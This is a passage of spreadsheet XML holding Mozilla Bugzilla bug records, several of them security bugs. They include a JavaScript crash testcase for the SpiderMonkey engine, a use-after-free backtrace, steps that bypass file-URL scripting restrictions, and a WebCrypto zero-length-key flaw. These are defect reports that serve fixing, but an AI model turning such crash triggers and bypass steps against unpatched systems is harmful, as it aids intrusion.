      <c r="I3863" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3863" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3863" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3863" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3863" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3863" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3863" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3863" t="inlineStr"/>
      <c r="Q3863" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3863" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3863" t="inlineStr">
        <is>
          <t>Bugzilla 2.14</t>
        </is>
      </c>
      <c r="T3863" t="n">
        <v>1</v>
      </c>
      <c r="U3863" t="n">
        <v>0</v>
      </c>
      <c r="V3863" t="n">
        <v>8</v>
      </c>
      <c r="W3863" t="inlineStr">
        <is>
          <t>System administrators at my site are concerned about my running bugzilla in one 
of their machines since users tend to use the same password for bugzilla and 
for their login account in the other machines. This password being plaintext in 
the DB mekes it available to the bugzilla admin (me) at any time.
Password should be only stored in it's encrypted form on the DB.</t>
        </is>
      </c>
      <c r="X3863" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3864">
      <c r="A3864" t="n">
        <v>693399</v>
      </c>
      <c r="B3864" t="inlineStr">
        <is>
          <t>2011-10-10 12:50:21 -0700</t>
        </is>
      </c>
      <c r="C3864" t="inlineStr">
        <is>
          <t>"ASSERTION: mDocumentPrincipal prematurely set!" with document.write to multiple documents</t>
        </is>
      </c>
      <c r="D3864" t="inlineStr">
        <is>
          <t>2012-09-13 15:09:03 -0700</t>
        </is>
      </c>
      <c r="E3864" t="n">
        <v>1</v>
      </c>
      <c r="F3864" t="n">
        <v>1</v>
      </c>
      <c r="G3864" t="n">
        <v>3</v>
      </c>
      <c r="H3864" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3864" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3864" t="inlineStr">
        <is>
          <t>DOM: Navigation</t>
        </is>
      </c>
      <c r="K3864" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3864" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3864" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3864" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3864" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3864" t="inlineStr">
        <is>
          <t>[sg:critical][qa!]</t>
        </is>
      </c>
      <c r="Q3864" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3864" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3864" t="inlineStr">
        <is>
          <t>mozilla11</t>
        </is>
      </c>
      <c r="T3864" t="n">
        <v>1</v>
      </c>
      <c r="U3864" t="n">
        <v>0</v>
      </c>
      <c r="V3864" t="n">
        <v>36</v>
      </c>
      <c r="W3864" t="inlineStr">
        <is>
          <t>Created attachment 565998
testcase
###!!! ASSERTION: mDocumentPrincipal prematurely set!: 'mDocumentPrincipal == nsnull', file dom/base/nsGlobalWindow.cpp, line 1805</t>
        </is>
      </c>
      <c r="X3864" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3865">
      <c r="A3865" t="n">
        <v>916635</v>
      </c>
      <c r="B3865" t="inlineStr">
        <is>
          <t>2013-09-15 18:07:17 -0700</t>
        </is>
      </c>
      <c r="C3865" t="inlineStr">
        <is>
          <t>Recursive graph traversal in RangeAnalysis</t>
        </is>
      </c>
      <c r="D3865" t="inlineStr">
        <is>
          <t>2015-02-25 20:47:27 -0800</t>
        </is>
      </c>
      <c r="E3865" t="n">
        <v>1</v>
      </c>
      <c r="F3865" t="n">
        <v>1</v>
      </c>
      <c r="G3865" t="n">
        <v>3</v>
      </c>
      <c r="H3865" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3865" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3865" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3865" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3865" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3865" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3865" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3865" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3865" t="inlineStr">
        <is>
          <t>[qa-][adv-main27+]</t>
        </is>
      </c>
      <c r="Q3865" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3865" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3865" t="inlineStr">
        <is>
          <t>mozilla27</t>
        </is>
      </c>
      <c r="T3865" t="n">
        <v>1</v>
      </c>
      <c r="U3865" t="n">
        <v>0</v>
      </c>
      <c r="V3865" t="n">
        <v>12</v>
      </c>
      <c r="W3865" t="inlineStr">
        <is>
          <t>Created attachment 805109
avoid-recursion.patch
RangeAnalysis::markBlocksInLoopBody uses recursion to visit all the basic blocks in a loop. Since there's no explicit limit on how many blocks a loop might contain, this could theoretically overflow the stack (though in practice, usually something else fails first).</t>
        </is>
      </c>
      <c r="X3865" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3866">
      <c r="A3866" t="n">
        <v>390756</v>
      </c>
      <c r="B3866" t="inlineStr">
        <is>
          <t>2007-08-03 00:51:11 -0700</t>
        </is>
      </c>
      <c r="C3866" t="inlineStr">
        <is>
          <t>Bugzilla turns unusable after adding another language</t>
        </is>
      </c>
      <c r="D3866" t="inlineStr">
        <is>
          <t>2007-08-20 13:50:30 -0700</t>
        </is>
      </c>
      <c r="E3866" t="n">
        <v>1</v>
      </c>
      <c r="F3866" t="n">
        <v>1</v>
      </c>
      <c r="G3866" t="n">
        <v>4</v>
      </c>
      <c r="H3866" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3866" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3866" t="inlineStr">
        <is>
          <t>Bugzilla-General</t>
        </is>
      </c>
      <c r="K3866" t="inlineStr">
        <is>
          <t>3.1</t>
        </is>
      </c>
      <c r="L3866" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3866" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3866" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3866" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3866" t="inlineStr"/>
      <c r="Q3866" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3866" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3866" t="inlineStr">
        <is>
          <t>Bugzilla 3.2</t>
        </is>
      </c>
      <c r="T3866" t="n">
        <v>1</v>
      </c>
      <c r="U3866" t="n">
        <v>0</v>
      </c>
      <c r="V3866" t="n">
        <v>11</v>
      </c>
      <c r="W3866" t="inlineStr">
        <is>
          <t>This is a regression of bug 374331.
After installing a second language and making Bugzilla aware of it by setting its language param, Bugzilla crashes on every page. This is because Bugzilla/Template/Plugin/Hook.pm calls Bugzilla::Template::sortAcceptLanguage, which was removed by bug 374331.
Steps to reproduce:
1. mkdir template/xx/
2. mkdir template/xx/custom/
3. Set language param to "en,xx"</t>
        </is>
      </c>
      <c r="X3866" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3867">
      <c r="A3867" t="n">
        <v>1814733</v>
      </c>
      <c r="B3867" t="inlineStr">
        <is>
          <t>2023-02-02 12:21:48 -0800</t>
        </is>
      </c>
      <c r="C3867" t="inlineStr">
        <is>
          <t>`caches.open("foo")` doesn't throw on partitioned third-party iframe on PBM</t>
        </is>
      </c>
      <c r="D3867" t="inlineStr">
        <is>
          <t>2023-12-05 11:55:54 -0800</t>
        </is>
      </c>
      <c r="E3867" t="n">
        <v>1</v>
      </c>
      <c r="F3867" t="n">
        <v>1</v>
      </c>
      <c r="G3867" t="n">
        <v>3</v>
      </c>
      <c r="H3867" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3867" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3867" t="inlineStr">
        <is>
          <t>Privacy: Anti-Tracking</t>
        </is>
      </c>
      <c r="K3867" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3867" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3867" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3867" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3867" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3867" t="inlineStr">
        <is>
          <t>[adv-main111+]</t>
        </is>
      </c>
      <c r="Q3867" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3867" t="inlineStr">
        <is>
          <t>S2</t>
        </is>
      </c>
      <c r="S3867" t="inlineStr">
        <is>
          <t>112 Branch</t>
        </is>
      </c>
      <c r="T3867" t="n">
        <v>1</v>
      </c>
      <c r="U3867" t="n">
        <v>0</v>
      </c>
      <c r="V3867" t="n">
        <v>44</v>
      </c>
      <c r="W3867" t="inlineStr">
        <is>
          <t>Steps:
0. Turn off `dom.caches.hide_in_pbmode.enabled` (when bisecting)
1. Open Private Browsing Mode
2. Access https://faz.net
3. Allow cookie access if prompted
4. Scroll down and play an embedded YT video
Expected: No entry should appear with `^privateBrowsing=1` in `/storage/default` in the profile directory.
Actual: It does.
Mozregression shows https://hg.mozilla.org/integration/autoland/pushloghtml?fromchange=a7402247dc7e4b5c0a4a173aa08545075a03f481&amp;tochange=cd3007f4be5d49ea21cadf77ef79f8d0aa798b3d, and from there bug 1758745 looks most relevant.</t>
        </is>
      </c>
      <c r="X3867" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3868">
      <c r="A3868" t="n">
        <v>479943</v>
      </c>
      <c r="B3868" t="inlineStr">
        <is>
          <t>2009-02-24 01:49:25 -0800</t>
        </is>
      </c>
      <c r="C3868" t="inlineStr">
        <is>
          <t>Restrictions on file-URL-to-file-URL scripting don't appear to be working properly</t>
        </is>
      </c>
      <c r="D3868" t="inlineStr">
        <is>
          <t>2009-06-11 15:15:52 -0700</t>
        </is>
      </c>
      <c r="E3868" t="n">
        <v>1</v>
      </c>
      <c r="F3868" t="n">
        <v>1</v>
      </c>
      <c r="G3868" t="n">
        <v>3</v>
      </c>
      <c r="H3868" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3868" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3868" t="inlineStr">
        <is>
          <t>Security: CAPS</t>
        </is>
      </c>
      <c r="K3868" t="inlineStr">
        <is>
          <t>unspecified</t>
        </is>
      </c>
      <c r="L3868" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3868" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3868" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3868" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3868" t="inlineStr">
        <is>
          <t>[sg:moderate]</t>
        </is>
      </c>
      <c r="Q3868" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3868" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3868" t="inlineStr">
        <is>
          <t>---</t>
        </is>
      </c>
      <c r="T3868" t="n">
        <v>1</v>
      </c>
      <c r="U3868" t="n">
        <v>0</v>
      </c>
      <c r="V3868" t="n">
        <v>24</v>
      </c>
      <c r="W3868" t="inlineStr">
        <is>
          <t>Collin and I were experimenting with the restrictions on file-URL-to-file-URL scripting and found some strange behavior.  Imagine you have the following files on your local file system:
/foo/bar/target.html (contains some text)
/foo/bar/child/index.html (contains an iframe to /foo/bar/target.html)
Steps to reproduce:
1) Type "file:///foo/bar/child/index.html" in the location bar and hit enter.
2) Notice that /foo/bar/child/index.html cannot access /foo/bar/target.html
3) Type "file:///foo/bar/target.html" in the location bar and hit enter.
4) Type "file:///foo/bar/child/index.html" in the location bar and hit enter.
5) Notice that /foo/bar/child/index.html *can* access /foo/bar/target.html
Bizarre, no?</t>
        </is>
      </c>
      <c r="X3868" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3869">
      <c r="A3869" t="n">
        <v>1204155</v>
      </c>
      <c r="B3869" t="inlineStr">
        <is>
          <t>2015-09-11 16:50:05 -0700</t>
        </is>
      </c>
      <c r="C3869" t="inlineStr">
        <is>
          <t>Missing status check in CryptoKey::SetSymKey creates potential security bug</t>
        </is>
      </c>
      <c r="D3869" t="inlineStr">
        <is>
          <t>2024-05-30 09:05:33 -0700</t>
        </is>
      </c>
      <c r="E3869" t="n">
        <v>1</v>
      </c>
      <c r="F3869" t="n">
        <v>1</v>
      </c>
      <c r="G3869" t="n">
        <v>3</v>
      </c>
      <c r="H3869" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3869" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3869" t="inlineStr">
        <is>
          <t>DOM: Security</t>
        </is>
      </c>
      <c r="K3869" t="inlineStr">
        <is>
          <t>40 Branch</t>
        </is>
      </c>
      <c r="L3869" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="M3869" t="inlineStr">
        <is>
          <t>Unspecified</t>
        </is>
      </c>
      <c r="N3869" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3869" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3869" t="inlineStr">
        <is>
          <t>[post-critsmash-triage][adv-main42+]</t>
        </is>
      </c>
      <c r="Q3869" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3869" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3869" t="inlineStr">
        <is>
          <t>mozilla44</t>
        </is>
      </c>
      <c r="T3869" t="n">
        <v>1</v>
      </c>
      <c r="U3869" t="n">
        <v>0</v>
      </c>
      <c r="V3869" t="n">
        <v>24</v>
      </c>
      <c r="W3869" t="inlineStr">
        <is>
          <t>CryptoKey::SetSymKey (dom\crypto\CryptoKey.cpp) assigns its argument to a member variable, but the destination isa CryptoBuffer, which isa FallibleTArray, so the assignment can fail if FF is nearly OOM due to some other operation. If it fails, the Javascript program that invoked SetSymKey (such as via crypto.subtle,deriveKey) receives a zero-length key. If it doesn't check the length before using the key for an encryption or signing operation, the resulting ciphertext or signature will be trivially weak.
Details:
--------
(cryptokey.cpp)
297: void CryptoKey::SetSymKey(const CryptoBuffer&amp; aSymKey)
298: {
299:   mSymKey = aSymKey;
300: }
(cryptokey.h)
61: class CryptoKey final : public nsISupports,
62:                         public nsWrapperCache,
63:                         public nsNSSShutDownObject
64: {
...
196:  CryptoBuffer mSymKey;
...
199:};
(cryptobuffer.h)
21: class CryptoBuffer : public FallibleTArray&lt;uint8_t&gt;
...
There is also a similar bug in CryptoKey::ReadStructuredClone line 1128.
There is also a similar bug in ImportKeyTask::SetKeyData (dom\crypto\WebCryptoTask.cpp line 1289, though that one appears to be latent, at least as to the code path that arises from window.crypto.subtle,deriveKey (ImportSymmetricKeyTask::BeforeCrypto gets called after the assignment. It checks whether mKeyData.Length() == 0, and errors out if so). There may, however, be other non-latent paths into SetKeyData.</t>
        </is>
      </c>
      <c r="X3869" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3870">
      <c r="A3870" t="n">
        <v>124333</v>
      </c>
      <c r="B3870" t="inlineStr">
        <is>
          <t>2002-02-07 21:14:51 -0800</t>
        </is>
      </c>
      <c r="C3870" t="inlineStr">
        <is>
          <t>composer unsaved HTML source change crashes mozilla</t>
        </is>
      </c>
      <c r="D3870" t="inlineStr">
        <is>
          <t>2014-10-11 17:08:06 -0700</t>
        </is>
      </c>
      <c r="E3870" t="n">
        <v>1</v>
      </c>
      <c r="F3870" t="n">
        <v>1</v>
      </c>
      <c r="G3870" t="n">
        <v>3</v>
      </c>
      <c r="H3870" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3870" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3870" t="inlineStr">
        <is>
          <t>Layout</t>
        </is>
      </c>
      <c r="K3870" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3870" t="inlineStr">
        <is>
          <t>x86</t>
        </is>
      </c>
      <c r="M3870" t="inlineStr">
        <is>
          <t>Windows 98</t>
        </is>
      </c>
      <c r="N3870" t="inlineStr">
        <is>
          <t>VERIFIED</t>
        </is>
      </c>
      <c r="O3870" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3870" t="inlineStr"/>
      <c r="Q3870" t="inlineStr">
        <is>
          <t>P1</t>
        </is>
      </c>
      <c r="R3870" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3870" t="inlineStr">
        <is>
          <t>mozilla1.1alpha</t>
        </is>
      </c>
      <c r="T3870" t="n">
        <v>1</v>
      </c>
      <c r="U3870" t="n">
        <v>0</v>
      </c>
      <c r="V3870" t="n">
        <v>26</v>
      </c>
      <c r="W3870" t="inlineStr">
        <is>
          <t>From Bugzilla Helper:
User-Agent: Mozilla/5.0 (Windows; U; Win98; en-US; rv:0.9.8) Gecko/20020204
BuildID:    2002020406
composer unsaved HTML source change crashes mozilla
Reproducible: Always
Steps to Reproduce:
1.Edit HTML using Composer/HTML
2.Click on preview or normal - Mozilla crashes
3.</t>
        </is>
      </c>
      <c r="X3870" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3871">
      <c r="A3871" t="n">
        <v>109012</v>
      </c>
      <c r="B3871" t="inlineStr">
        <is>
          <t>2001-11-08 01:19:34 -0800</t>
        </is>
      </c>
      <c r="C3871" t="inlineStr">
        <is>
          <t>Hackers' Guide - The three questions.</t>
        </is>
      </c>
      <c r="D3871" t="inlineStr">
        <is>
          <t>2012-12-18 20:46:27 -0800</t>
        </is>
      </c>
      <c r="E3871" t="n">
        <v>1</v>
      </c>
      <c r="F3871" t="n">
        <v>1</v>
      </c>
      <c r="G3871" t="n">
        <v>4</v>
      </c>
      <c r="H3871" t="inlineStr">
        <is>
          <t>Server Software</t>
        </is>
      </c>
      <c r="I3871" t="inlineStr">
        <is>
          <t>Bugzilla</t>
        </is>
      </c>
      <c r="J3871" t="inlineStr">
        <is>
          <t>bugzilla.org</t>
        </is>
      </c>
      <c r="K3871" t="inlineStr">
        <is>
          <t>2.15</t>
        </is>
      </c>
      <c r="L3871" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="M3871" t="inlineStr">
        <is>
          <t>All</t>
        </is>
      </c>
      <c r="N3871" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3871" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3871" t="inlineStr"/>
      <c r="Q3871" t="inlineStr">
        <is>
          <t>P3</t>
        </is>
      </c>
      <c r="R3871" t="inlineStr">
        <is>
          <t>normal</t>
        </is>
      </c>
      <c r="S3871" t="inlineStr">
        <is>
          <t>Bugzilla 2.16</t>
        </is>
      </c>
      <c r="T3871" t="n">
        <v>1</v>
      </c>
      <c r="U3871" t="n">
        <v>0</v>
      </c>
      <c r="V3871" t="n">
        <v>5</v>
      </c>
      <c r="W3871" t="inlineStr">
        <is>
          <t>Whenever you're fixing a bug, you should ask yourself three questions:
1. Where else in the codebase might this bug occur.  Make sure these are fixed
as well or reported.
2. How could you, or the Bugzilla team in general, prevent this problem in
future?  Consider reusable subs that could be introduced, or tests that could be
added to the testing suite.
3. Could this have regressed anything?</t>
        </is>
      </c>
      <c r="X3871" t="n">
        <v>0</v>
      </c>
    </row>
    <row r="3872">
      <c r="A3872" t="n">
        <v>1254622</v>
      </c>
      <c r="B3872" t="inlineStr">
        <is>
          <t>2016-03-08 10:24:46 -0800</t>
        </is>
      </c>
      <c r="C3872" t="inlineStr">
        <is>
          <t>Crash [@ js::PreliminaryObjectArray::registerNewObject] with use-after-free</t>
        </is>
      </c>
      <c r="D3872" t="inlineStr">
        <is>
          <t>2016-09-22 17:19:15 -0700</t>
        </is>
      </c>
      <c r="E3872" t="n">
        <v>1</v>
      </c>
      <c r="F3872" t="n">
        <v>1</v>
      </c>
      <c r="G3872" t="n">
        <v>3</v>
      </c>
      <c r="H3872" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3872" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3872" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3872" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3872" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3872" t="inlineStr">
        <is>
          <t>Linux</t>
        </is>
      </c>
      <c r="N3872" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3872" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3872" t="inlineStr">
        <is>
          <t>[jsbugmon:][adv-main46+][adv-esr45.1+][adv-esr38.8+]</t>
        </is>
      </c>
      <c r="Q3872" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3872" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3872" t="inlineStr">
        <is>
          <t>mozilla48</t>
        </is>
      </c>
      <c r="T3872" t="n">
        <v>1</v>
      </c>
      <c r="U3872" t="n">
        <v>0</v>
      </c>
      <c r="V3872" t="n">
        <v>22</v>
      </c>
      <c r="W3872" t="inlineStr">
        <is>
          <t>The attached testcase crashes on mozilla-central revision b6acf4d4fc20 (build with --enable-optimize --enable-posix-nspr-emulation --enable-valgrind --enable-gczeal --disable-tests --enable-debug, run with --fuzzing-safe --thread-count=2 --ion-extra-checks).
Backtrace:
Program terminated with signal SIGSEGV, Segmentation fault.
#0  js::PreliminaryObjectArray::registerNewObject (this=0xe5e5e5e5e5e5e5e5, res=res@entry=0x7fc8683691a0) at js/src/vm/TypeInference.cpp:3346
#1  0x0000000000b6c742 in js::TypeNewScript::registerNewObject (this=this@entry=0x7fc864993fd0, res=res@entry=0x7fc8683691a0)
    at js/src/vm/TypeInference.cpp:3605
#2  0x000000000094f95c in CreateThisForFunctionWithGroup (newKind=js::TenuredObject, group=..., cx=0x7fc866d07800) at js/src/jsobj.cpp:936
#3  js::CreateThisForFunctionWithProto (cx=cx@entry=0x7fc866d07800, callee=..., callee@entry=..., newTarget=..., newTarget@entry=..., proto=..., proto@entry=..., newKind=newKind@entry=js::GenericObject)
    at js/src/jsobj.cpp:975
#4  0x000000000094fea6 in js::CreateThisForFunction (cx=cx@entry=0x7fc866d07800, callee=callee@entry=..., newTarget=..., newTarget@entry=..., newKind=js::GenericObject)
    at js/src/jsobj.cpp:1019
#5  0x0000000000a9d1cd in js::RunState::maybeCreateThisForConstructor (this=this@entry=0x7fff728e8ad0, cx=cx@entry=0x7fc866d07800)
    at js/src/vm/Interpreter.cpp:356
#6  0x0000000000699657 in js::jit::CanEnter (cx=cx@entry=0x7fc866d07800, state=...) at js/src/jit/Ion.cpp:2506
#7  0x0000000000ab8869 in js::RunScript (cx=cx@entry=0x7fc866d07800, state=...) at js/src/vm/Interpreter.cpp:404
#8  0x0000000000ab8c8d in js::Invoke (cx=cx@entry=0x7fc866d07800, args=..., construct=construct@entry=js::CONSTRUCT) at js/src/vm/Interpreter.cpp:496
#9  0x0000000000ab9018 in InternalConstruct (cx=cx@entry=0x7fc866d07800, args=...) at js/src/vm/Interpreter.cpp:557
#10 0x0000000000ab9177 in js::Construct (cx=cx@entry=0x7fc866d07800, fval=..., fval@entry=..., args=..., newTarget=..., newTarget@entry=..., objp=..., objp@entry=...)
    at js/src/vm/Interpreter.cpp:604
#11 0x00000000006155d1 in js::jit::DoCallFallback (cx=0x7fc866d07800, frame=0x7fff728e90d8, stub_=&lt;optimized out&gt;, argc=&lt;optimized out&gt;, vp=0x7fff728e9028, res=...)
    at js/src/jit/BaselineIC.cpp:6117
[...]
#22 0x0000000000000000 in ?? ()
(gdb) info reg
rax            0x0      0
rbx            0x7fc866d07800   140498695124992
rcx            0x7fc8683b0760   140498718885728
rdx            0x1c2d080        29544576
rsi            0x7fc8683691a0   140498718593440
rdi            0xe5e5e5e5e5e5e5e5       -1880844493789993499
rbp            0x7fff728e8740   0x7fff728e8740
rsp            0x7fff728e8740   0x7fff728e8740
r8             0x14     20
r9             0x14     20
r10            0xd      13
r11            0x3b     59
r12            0x2      2
r13            0x7fff728e87a0   140735115331488
r14            0x7fff728e8780   140735115331456
r15            0x7fc864993fd0   140498657951696
rip            0xb6c308 0xb6c308 &lt;js::PreliminaryObjectArray::registerNewObject(JSObject*)+40&gt;
eflags         0x10246  [ PF ZF IF RF ]
cs             0x33     51
ss             0x2b     43
ds             0x0      0
es             0x0      0
fs             0x0      0
gs             0x0      0
(gdb) x /i $pc
=&gt; 0xb6c308 &lt;js::PreliminaryObjectArray::registerNewObject(JSObject*)+40&gt;:      cmpq   $0x0,(%rdi,%rax,8)
Looks like use-after-free, marking s-s and sec-critical. Unfortunately the testcase is slightly intermittent. Bisection might not be accurate when done by JSBugMon. I should also note that I was not able to reproduce this bug under GDB directly *at all*. On the command line, it reproduced very reliably for me though.</t>
        </is>
      </c>
      <c r="X3872" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3873">
      <c r="A3873" t="n">
        <v>886102</v>
      </c>
      <c r="B3873" t="inlineStr">
        <is>
          <t>2013-06-23 03:19:01 -0700</t>
        </is>
      </c>
      <c r="C3873" t="inlineStr">
        <is>
          <t>Crash [@ js::detail::HashTable] or Assertion failure: outermostScript-&gt;hasParallelIonScript(), at ion/ParallelFunctions.cpp</t>
        </is>
      </c>
      <c r="D3873" t="inlineStr">
        <is>
          <t>2014-05-05 19:09:00 -0700</t>
        </is>
      </c>
      <c r="E3873" t="n">
        <v>1</v>
      </c>
      <c r="F3873" t="n">
        <v>1</v>
      </c>
      <c r="G3873" t="n">
        <v>3</v>
      </c>
      <c r="H3873" t="inlineStr">
        <is>
          <t>Components</t>
        </is>
      </c>
      <c r="I3873" t="inlineStr">
        <is>
          <t>Core</t>
        </is>
      </c>
      <c r="J3873" t="inlineStr">
        <is>
          <t>JavaScript Engine</t>
        </is>
      </c>
      <c r="K3873" t="inlineStr">
        <is>
          <t>Trunk</t>
        </is>
      </c>
      <c r="L3873" t="inlineStr">
        <is>
          <t>x86_64</t>
        </is>
      </c>
      <c r="M3873" t="inlineStr">
        <is>
          <t>macOS</t>
        </is>
      </c>
      <c r="N3873" t="inlineStr">
        <is>
          <t>RESOLVED</t>
        </is>
      </c>
      <c r="O3873" t="inlineStr">
        <is>
          <t>FIXED</t>
        </is>
      </c>
      <c r="P3873" t="inlineStr">
        <is>
          <t>[adv-main25+]</t>
        </is>
      </c>
      <c r="Q3873" t="inlineStr">
        <is>
          <t>--</t>
        </is>
      </c>
      <c r="R3873" t="inlineStr">
        <is>
          <t>critical</t>
        </is>
      </c>
      <c r="S3873" t="inlineStr">
        <is>
          <t>mozilla25</t>
        </is>
      </c>
      <c r="T3873" t="n">
        <v>1</v>
      </c>
      <c r="U3873" t="n">
        <v>0</v>
      </c>
      <c r="V3873" t="n">
        <v>19</v>
      </c>
      <c r="W3873" t="inlineStr">
        <is>
          <t>Created attachment 766403
stacks
x = Iterator((function() {}), true);
y = Iterator((function() {}), true);
y = ArrayBuffer();
ParallelArray([99999], function(z) {
    if (z % 1000 == 99) {
        x.n
    }
})
crashes js debug shell on m-c changeset 4c4f75c20e9b without any CLI arguments at js::detail::HashTable, and sometimes asserts at Assertion failure: outermostScript-&gt;hasParallelIonScript(), at ion/ParallelFunctions.cpp
s-s because this testcase keeps alternating between a crash, an assert, and exiting normally, locking to be safe.</t>
        </is>
      </c>
      <c r="X3873" t="n">
        <v>1</v>
      </c>
    </row>
    <row r="3874">
      <c r="A3874" t="n">
        <v>637929</v>
      </c>
      <c r="B3874" t="inlineStr">
        <is>
          <t>2011-03-01 16:11:41 -0800</t>
        </is>
      </c>
      <c r="C3874" t="inlineStr">
        <is>
          <t>uploading an image causes a UnicodeDecodeError</t>
        </is>
      </c>
      <c r="D3874" t="inlineStr">
        <is>
          <t>2014-09-24 06:39:12 -0700</t>
        </is>
      </c>
      <c r="E3874" t="n">
        <v>1</v>
      </c>
      <c r="F3874" t="n">
        <v>1</v>
      </c>
      <c r="G3874" t="n">
        <v>6</v>
      </c>
      <c r="H3874" t="inlineStr">
        <is>
          <t>Graveyard</t>
        </is>
      </c>
      <c r="I3874" t="inlineStr">
        <is>
